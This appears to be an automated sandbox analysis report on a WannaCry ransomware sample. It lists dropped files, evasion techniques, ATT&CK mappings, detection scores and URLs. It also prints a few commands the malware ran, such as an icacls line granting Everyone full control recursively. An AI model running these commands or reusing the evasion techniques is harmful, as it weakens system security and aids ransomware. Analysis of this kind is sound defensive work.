Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\~SD91F8.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SDF182.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDF183.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\7-Zip\~SDF184.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\~SDF185.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\~SDF186.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\System Tools\~SDF187.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Administrative Tools\~SDF188.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\~SDF189.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\~SDF18A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SDDB1F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDDB20.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\~SDDB21.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Microsoft Office Tools\~SDDB22.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\~SDDB23.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\~SDDB24.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\~SDDB25.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SD3B19.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SD3B1A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\7-Zip\~SD3B1B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessibility\~SD3B2C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3B2D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3B2E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3B2F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD3B30.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD3B31.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD3B32.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Java\~SD3B33.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD3B34.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\~SD3B35.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD3B36.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\System Tools\~SD3B37.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\~SD3B38.tmp	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Creates files in the recycle bin to hide itself

Source: C:\Users\user\Desktop\WannaCry_2.EXE

File created: C:\$Recycle.Bin\~SDB3EE.tmp

Jump to behavior

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Code function: 0_2_10004790

0_2_10004790

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Stalling execution: Execution stalls by calling Sleep

graph_0-2173

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Window / User API: threadDelayed 4879
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Window / User API: threadDelayed 2158

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Dropped PE file which has not been started: C:\Users\user\Desktop\taskse.exe

Jump to dropped file

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Evaded block: after key decision

graph_0-1593

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-1614

Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 5712	Thread sleep count: 133 > 30
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 5712	Thread sleep time: -133000s >= -30000s
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 3552	Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 3600	Thread sleep count: 65 > 30
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 3600	Thread sleep time: -195000s >= -30000s
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 3688	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 4196	Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 4196	Thread sleep time: -960000s >= -30000s
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 5712	Thread sleep count: 4879 > 30
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 5712	Thread sleep time: -4879000s >= -30000s
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 3600	Thread sleep count: 2158 > 30
Source: C:\Users\user\Desktop\WannaCry_2.EXE TID: 3600	Thread sleep time: -6474000s >= -30000s
Source: C:\Windows\System32\SIHClient.exe TID: 6680	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,??_U@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,		0_2_10002300
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,		0_2_10004A40

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\GenuineTicket\~SD7337.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\~SDFE2E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\~SD7324.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\Apps\~SD7336.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\~SD7325.tmp	Jump to behavior
Source: C:\Users\user\Desktop\WannaCry_2.EXE	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\~SD7323.tmp	Jump to behavior

Source: SIHClient.exe, 00000043.00000003.1278535097.00000212F2D69000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000043.00000003.1276329176.00000212F2D5D000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000043.00000003.1655940115.00000212F2D69000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000043.00000003.1276978536.00000212F2D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9[
Source: cscript.exe, 0000000A.00000003.1145214173.0000000003497000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cscript.exe, 0000000A.00000003.1145214173.0000000003497000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SIHClient.exe, 00000043.00000003.1276329176.00000212F2D5D000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000043.00000003.1276626478.00000212F2D0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: @WanaDecryptor@.exe, 000000CA.00000002.2384105544.000000000046F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\WannaCry_2.EXE

0_2_100011D0

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Code function: 0_2_10001360 time,AllocateAndInitializeSid,time,CheckTokenMembership,FreeSid,

0_2_10001360

Source: C:\Windows\SysWOW64\cscript.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Code function: 0_2_100053F0 GetUserNameW,_wcsicmp,

0_2_100053F0

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\taskdl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\Desktop\taskdl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	3 Windows Management Instrumentation	12 Scripting	11 Process Injection	21 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	21 Data Encrypted for Impact
Credentials	Domains	Default Accounts	3 Native API	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Proxy	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	At	1 Services File Permissions Weakness	1 Services File Permissions Weakness	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	1 Hidden Files and Directories	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Services File Permissions Weakness	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	33 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
WannaCry_2.EXE	92%	ReversingLabs	Win32.Ransomware.WannaCry
WannaCry_2.EXE	95%	Virustotal		Browse
WannaCry_2.EXE	100%	Avira	TR/Ransom.JB
WannaCry_2.EXE	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\@WanaDecryptor@.exe	100%	Avira	TR/FileCoder.724645
C:\@WanaDecryptor@.exe	100%	Joe Sandbox ML
C:\@WanaDecryptor@.exe	97%	ReversingLabs	Win32.Ransomware.WannaCry
C:\@WanaDecryptor@.exe	91%	Virustotal		Browse
C:\Users\user\AppData\Local\@WanaDecryptor@.exe	97%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\AppData\Local\@WanaDecryptor@.exe	91%	Virustotal		Browse
C:\Users\user\Desktop\@WanaDecryptor@.exe	97%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Desktop\@WanaDecryptor@.exe	91%	Virustotal		Browse
C:\Users\user\Desktop\taskdl.exe	96%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Desktop\taskdl.exe	88%	Virustotal		Browse
C:\Users\user\Desktop\taskse.exe	89%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Desktop\taskse.exe	91%	Virustotal		Browse
C:\Users\user\Desktop\u.wnry	97%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Desktop\u.wnry	91%	Virustotal		Browse
C:\Users\user\Documents\@WanaDecryptor@.exe	97%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Documents\@WanaDecryptor@.exe	91%	Virustotal		Browse
C:\Users\user\Downloads\@WanaDecryptor@.exe	97%	ReversingLabs	Win32.Ransomware.WannaCry
C:\Users\user\Downloads\@WanaDecryptor@.exe	91%	Virustotal		Browse

Name	Source	Malicious
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000047.00000003.1366699932.000001DB1BE67000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dynamic.tiles.virtuh	svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 00000047.00000003.1366457653.000001DB1BE86000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000047.00000002.1367979156.000001DB1BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1366699932.000001DB1BE67000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368145142.000001DB1BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368380250.000001DB1BE65000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ss	svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368020361.000001DB1BE36000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs(_	svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dynamic.tiles.virtua	svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=	svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.microsoft.cP	SIHClient.exe, 00000043.00000003.1653352890.00000212F3779000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/	svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368352141.000001DB1BE59000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp	false
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000047.00000003.1366770859.000001DB1BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367043880.000001DB1BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1366925556.000001DB1BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368380250.000001DB1BE65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000002.1368532706.000001DB1BE81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000047.00000002.1367979156.000001DB1BE2B000.00000004.00000020.00020000.00000000.sdmp	false
https://t0.ssl.ak.dyn	svchost.exe, 00000047.00000003.1367198337.000001DB1BE32000.00000004.00000020.00020000.00000000.sdmp	false
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	WannaCry_2.EXE, 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, WannaCry_2.EXE, 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 000000CA.00000002.2383911467.0000000000421000.00000004.00000001.01000000.00000009.sdmp	true
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000047.00000003.1367113384.000001DB1BE41000.00000004.00000020.00020000.00000000.sdmp	false
